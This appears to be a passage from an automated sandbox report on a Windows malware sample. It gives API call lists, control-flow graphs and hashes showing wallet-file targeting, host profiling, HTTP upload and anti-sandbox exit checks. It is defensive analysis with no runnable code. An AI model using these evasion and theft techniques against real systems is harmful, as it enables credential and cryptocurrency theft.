                                    • GetProcAddress.KERNEL32(75BD0000,018A5F50), ref: 00BEA67A
                                    • GetProcAddress.KERNEL32(75BD0000,018B8D20), ref: 00BEA692
                                    • GetProcAddress.KERNEL32(75BD0000,018BD150), ref: 00BEA6AB
                                    • GetProcAddress.KERNEL32(75BD0000,018BD168), ref: 00BEA6C3
                                    • GetProcAddress.KERNEL32(75BD0000,018A5E30), ref: 00BEA6DB
                                    • GetProcAddress.KERNEL32(75BD0000,018A5E70), ref: 00BEA6F4
                                    • GetProcAddress.KERNEL32(75BD0000,018BD0D8), ref: 00BEA70C
                                    • GetProcAddress.KERNEL32(75BD0000,018BD1E0), ref: 00BEA724
                                    • GetProcAddress.KERNEL32(75A70000,018A5E90), ref: 00BEA746
                                    • GetProcAddress.KERNEL32(75A70000,018BD0F0), ref: 00BEA75E
                                    • GetProcAddress.KERNEL32(75A70000,018BD030), ref: 00BEA776
                                    • GetProcAddress.KERNEL32(75A70000,018BD210), ref: 00BEA78F
                                    • GetProcAddress.KERNEL32(75A70000,018BCF28), ref: 00BEA7A7
                                    • GetProcAddress.KERNEL32(75450000,018A5EB0), ref: 00BEA7C8
                                    • GetProcAddress.KERNEL32(75450000,018A5F70), ref: 00BEA7E1
                                    • GetProcAddress.KERNEL32(75DA0000,018A5F90), ref: 00BEA802
                                    • GetProcAddress.KERNEL32(75DA0000,018BD180), ref: 00BEA81A
                                    • GetProcAddress.KERNEL32(6F070000,018A5FB0), ref: 00BEA840
                                    • GetProcAddress.KERNEL32(6F070000,018A5FF0), ref: 00BEA858
                                    • GetProcAddress.KERNEL32(6F070000,018A6010), ref: 00BEA870
                                    • GetProcAddress.KERNEL32(6F070000,018BD108), ref: 00BEA889
                                    • GetProcAddress.KERNEL32(6F070000,018A6030), ref: 00BEA8A1
                                    • GetProcAddress.KERNEL32(6F070000,018A6070), ref: 00BEA8B9
                                    • GetProcAddress.KERNEL32(6F070000,018A5CB0), ref: 00BEA8D2
                                    • GetProcAddress.KERNEL32(6F070000,018A5D30), ref: 00BEA8EA
                                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00BEA901
                                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00BEA917
                                    • GetProcAddress.KERNEL32(75AF0000,018BCF58), ref: 00BEA939
                                    • GetProcAddress.KERNEL32(75AF0000,018B8D30), ref: 00BEA951
                                    • GetProcAddress.KERNEL32(75AF0000,018BCF70), ref: 00BEA969
                                    • GetProcAddress.KERNEL32(75AF0000,018BCF88), ref: 00BEA982
                                    • GetProcAddress.KERNEL32(75D90000,018A5D50), ref: 00BEA9A3
                                    • GetProcAddress.KERNEL32(6FAA0000,018BD198), ref: 00BEA9C4
                                    • GetProcAddress.KERNEL32(6FAA0000,018A5D70), ref: 00BEA9DD
                                    • GetProcAddress.KERNEL32(6FAA0000,018BD1B0), ref: 00BEA9F5
                                    • GetProcAddress.KERNEL32(6FAA0000,018BCFA0), ref: 00BEAA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: c0548ce235ebb310dae18665448b151c17ef9ce2cbbaaedbca1f5ab1c4cceb65
                                    • Instruction ID: 6eb888a85847816962a94d51623b3d9dd6d80038d39d83592dd9ce384c056bd5
                                    • Opcode Fuzzy Hash: c0548ce235ebb310dae18665448b151c17ef9ce2cbbaaedbca1f5ab1c4cceb65
                                    • Instruction Fuzzy Hash: F06264B66191009FC344DFABEC88A667BF9B79F341704851AB989E3270D734B949CF60
                                    Function 00BD48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 bd48d0-bd4992 call beaab0 call bd4800 call beaa50 * 5 InternetOpenA StrCmpCA 816 bd499b-bd499f 801->816 817 bd4994 801->817 818 bd4f1b-bd4f43 InternetCloseHandle call beade0 call bda210 816->818 819 bd49a5-bd4b1d call be8cf0 call beac30 call beabb0 call beab10 * 2 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beac30 call beabb0 call beab10 * 2 InternetConnectA 816->819 817->816 829 bd4f45-bd4f7d call beab30 call beacc0 call beabb0 call beab10 818->829 830 bd4f82-bd4ff2 call be8b20 * 2 call beaab0 call beab10 * 8 818->830 819->818 905 bd4b23-bd4b27 819->905 829->830 906 bd4b29-bd4b33 905->906 907 bd4b35 905->907 908 bd4b3f-bd4b72 HttpOpenRequestA 906->908 907->908 909 bd4f0e-bd4f15 InternetCloseHandle 908->909 910 bd4b78-bd4e78 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beaa50 call beac30 * 2 call beabb0 call beab10 * 2 call beade0 lstrlen call beade0 * 2 lstrlen call beade0 HttpSendRequestA 908->910 909->818 1021 bd4e82-bd4eac InternetReadFile 910->1021 1022 bd4eae-bd4eb5 1021->1022 1023 bd4eb7-bd4f09 InternetCloseHandle call beab10 1021->1023 1022->1023 1024 bd4eb9-bd4ef7 call beacc0 call beabb0 call beab10 1022->1024 1023->909 1024->1021
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                      • Part of subcall function 00BD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BD4965
                                    • StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD4B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00BF0DDE,00000000,?,?,00000000,?,",00000000,?,018BE688), ref: 00BD4E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BD4E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BD4E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BD4E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD4EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD4F15
                                    • HttpOpenRequestA.WININET(00000000,018BE708,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD4B65
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD4F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: a8b615615ea66bdb84f64c4dbe1a325b69ed04993256c999f7c02a4807b7d73d
                                    • Instruction ID: b4ded53b416b266d5f355b239cdb4f36c0aedb39bd232527c4824a51f6142f4c
                                    • Opcode Fuzzy Hash: a8b615615ea66bdb84f64c4dbe1a325b69ed04993256c999f7c02a4807b7d73d
                                    • Instruction Fuzzy Hash: 6112F972911158ABCB14EBA1CDA2FEEB7BDAF25300F1145D9B10662191EF707B48CF61
                                    Function 00BE5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 be5760-be57c7 call be5d20 call beab30 * 3 call beaa50 * 4 1106 be57cc-be57d3 1090->1106 1107 be5827-be589c call beaa50 * 2 call bd1590 call be5510 call beabb0 call beab10 call beade0 StrCmpCA 1106->1107 1108 be57d5-be5806 call beab30 call beaab0 call bd1590 call be5440 1106->1108 1134 be58e3-be58f9 call beade0 StrCmpCA 1107->1134 1138 be589e-be58de call beaab0 call bd1590 call be5440 call beabb0 call beab10 1107->1138 1124 be580b-be5822 call beabb0 call beab10 1108->1124 1124->1134 1139 be58ff-be5906 1134->1139 1140 be5a2c-be5a94 call beabb0 call beab30 * 2 call bd16b0 call beab10 * 4 call bd1670 call bd1550 1134->1140 1138->1134 1142 be590c-be5913 1139->1142 1143 be5a2a-be5aaf call beade0 StrCmpCA 1139->1143 1269 be5d13-be5d16 1140->1269 1146 be596e-be59e3 call beaa50 * 2 call bd1590 call be5510 call beabb0 call beab10 call beade0 StrCmpCA 1142->1146 1147 be5915-be5969 call beab30 call beaab0 call bd1590 call be5440 call beabb0 call beab10 1142->1147 1162 be5ab5-be5abc 1143->1162 1163 be5be1-be5c49 call beabb0 call beab30 * 2 call bd16b0 call beab10 * 4 call bd1670 call bd1550 1143->1163 1146->1143 1246 be59e5-be5a25 call beaab0 call bd1590 call be5440 call beabb0 call beab10 1146->1246 1147->1143 1168 be5bdf-be5c64 call beade0 StrCmpCA 1162->1168 1169 be5ac2-be5ac9 1162->1169 1163->1269 1198 be5c78-be5ce1 call beabb0 call beab30 * 2 call bd16b0 call beab10 * 4 call bd1670 call bd1550 1168->1198 1199 be5c66-be5c71 Sleep 1168->1199 1176 be5acb-be5b1e call beab30 call beaab0 call bd1590 call be5440 call beabb0 call beab10 1169->1176 1177 be5b23-be5b98 call beaa50 * 2 call bd1590 call be5510 call beabb0 call beab10 call beade0 StrCmpCA 1169->1177 1176->1168 1177->1168 1274 be5b9a-be5bda call beaab0 call bd1590 call be5440 call beabb0 call beab10 1177->1274 1198->1269 1199->1106 1246->1143 1274->1168
                                    APIs
                                      • Part of subcall function 00BEAB30: lstrlen.KERNEL32(00BD4F55,?,?,00BD4F55,00BF0DDF), ref: 00BEAB3B
                                      • Part of subcall function 00BEAB30: lstrcpy.KERNEL32(00BF0DDF,00000000), ref: 00BEAB95
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE5894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE58F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE5AA7
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BE5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE5478
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE5568
                                      • Part of subcall function 00BE5510: lstrlen.KERNEL32(00000000), ref: 00BE557F
                                      • Part of subcall function 00BE5510: StrStrA.SHLWAPI(00000000,00000000), ref: 00BE55B4
                                      • Part of subcall function 00BE5510: lstrlen.KERNEL32(00000000), ref: 00BE55D3
                                      • Part of subcall function 00BE5510: lstrlen.KERNEL32(00000000), ref: 00BE55FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE59DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE5B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE5C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 00BE5C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 8272a445752fc435460a3049f081eba27f7c0127849ddf1336f6ef4700446233
                                    • Instruction ID: 07200f581cd9b926efc69fbc4c86876f0e3a12bb29683ca0d31a6db4295c4c14
                                    • Opcode Fuzzy Hash: 8272a445752fc435460a3049f081eba27f7c0127849ddf1336f6ef4700446233
                                    • Instruction Fuzzy Hash: CCE13171D101489ACB14FBB6EDA2EED77BDAF55300F4085E8B50666191EF34BA0CCB62
                                    Function 00BE19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 be19f0-be1a1d call beade0 StrCmpCA 1304 be1a1f-be1a21 ExitProcess 1301->1304 1305 be1a27-be1a41 call beade0 1301->1305 1309 be1a44-be1a48 1305->1309 1310 be1a4e-be1a61 1309->1310 1311 be1c12-be1c1d call beab10 1309->1311 1312 be1bee-be1c0d 1310->1312 1313 be1a67-be1a6a 1310->1313 1312->1309 1315 be1b1f-be1b30 StrCmpCA 1313->1315 1316 be1bdf-be1be9 call beab30 1313->1316 1317 be1afd-be1b0e StrCmpCA 1313->1317 1318 be1a99-be1aa8 call beab30 1313->1318 1319 be1a71-be1a80 call beab30 1313->1319 1320 be1acf-be1ae0 StrCmpCA 1313->1320 1321 be1aad-be1abe StrCmpCA 1313->1321 1322 be1a85-be1a94 call beab30 1313->1322 1323 be1b82-be1b93 StrCmpCA 1313->1323 1324 be1b63-be1b74 StrCmpCA 1313->1324 1325 be1bc0-be1bd1 StrCmpCA 1313->1325 1326 be1b41-be1b52 StrCmpCA 1313->1326 1327 be1ba1-be1bb2 StrCmpCA 1313->1327 1344 be1b3c 1315->1344 1345 be1b32-be1b35 1315->1345 1316->1312 1342 be1b1a 1317->1342 1343 be1b10-be1b13 1317->1343 1318->1312 1319->1312 1340 be1aee-be1af1 1320->1340 1341 be1ae2-be1aec 1320->1341 1338 be1aca 1321->1338 1339 be1ac0-be1ac3 1321->1339 1322->1312 1350 be1b9f 1323->1350 1351 be1b95-be1b98 1323->1351 1348 be1b76-be1b79 1324->1348 1349 be1b80 1324->1349 1332 be1bdd 1325->1332 1333 be1bd3-be1bd6 1325->1333 1346 be1b5e 1326->1346 1347 be1b54-be1b57 1326->1347 1329 be1bbe 1327->1329 1330 be1bb4-be1bb7 1327->1330 1329->1312 1330->1329 1332->1312 1333->1332 1338->1312 1339->1338 1355 be1af8 1340->1355 1341->1355 1342->1312 1343->1342 1344->1312 1345->1344 1346->1312 1347->1346 1348->1349 1349->1312 1350->1312 1351->1350 1355->1312
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00BE1A15
                                    • ExitProcess.KERNEL32 ref: 00BE1A21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 19ba534012f29d6afcc7273f8851f2827b89a73999831b592b958a0f5bacec16
                                    • Instruction ID: 50b69078cf7a5413a938a3272c47629b901d0f745dc838051f89177e3e959759
                                    • Opcode Fuzzy Hash: 19ba534012f29d6afcc7273f8851f2827b89a73999831b592b958a0f5bacec16
                                    • Instruction Fuzzy Hash: FD5132B4B042499FCB04DFA9D994BAE77F9EF44704F2044D8E912AB261E770E944CB61
                                    Function 00BE6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2148), ref: 00BE9BF1
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B21F0), ref: 00BE9C0A
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2178), ref: 00BE9C22
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B22B0), ref: 00BE9C3A
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2190), ref: 00BE9C53
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B8E00), ref: 00BE9C6B
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018A60D0), ref: 00BE9C83
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018A6430), ref: 00BE9C9C
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B22C8), ref: 00BE9CB4
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B1FE0), ref: 00BE9CCC
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B1FF8), ref: 00BE9CE5
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2010), ref: 00BE9CFD
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018A62D0), ref: 00BE9D15
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2028), ref: 00BE9D2E
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BD11D0: ExitProcess.KERNEL32 ref: 00BD1211
                                      • Part of subcall function 00BD1160: GetSystemInfo.KERNEL32(?), ref: 00BD116A
                                      • Part of subcall function 00BD1160: ExitProcess.KERNEL32 ref: 00BD117E
                                      • Part of subcall function 00BD1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BD112B
                                      • Part of subcall function 00BD1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BD1132
                                      • Part of subcall function 00BD1110: ExitProcess.KERNEL32 ref: 00BD1143
                                      • Part of subcall function 00BD1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BD123E
                                      • Part of subcall function 00BD1220: __aulldiv.LIBCMT ref: 00BD1258
                                      • Part of subcall function 00BD1220: __aulldiv.LIBCMT ref: 00BD1266
                                      • Part of subcall function 00BD1220: ExitProcess.KERNEL32 ref: 00BD1294
                                      • Part of subcall function 00BE6A10: GetUserDefaultLangID.KERNEL32 ref: 00BE6A14
                                      • Part of subcall function 00BD1190: ExitProcess.KERNEL32 ref: 00BD11C6
                                      • Part of subcall function 00BE79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BD11B7), ref: 00BE7A10
                                      • Part of subcall function 00BE79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BE7A17
                                      • Part of subcall function 00BE79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BE7A2F
                                      • Part of subcall function 00BE7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7AA0
                                      • Part of subcall function 00BE7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00BE7AA7
                                      • Part of subcall function 00BE7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00BE7ABF
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018B8E90,?,00BF10F4,?,00000000,?,00BF10F8,?,00000000,00BF0AF3), ref: 00BE6D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BE6D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00BE6D99
                                    • Sleep.KERNEL32(00001770), ref: 00BE6DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,018B8E90,?,00BF10F4,?,00000000,?,00BF10F8,?,00000000,00BF0AF3), ref: 00BE6DBA
                                    • ExitProcess.KERNEL32 ref: 00BE6DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
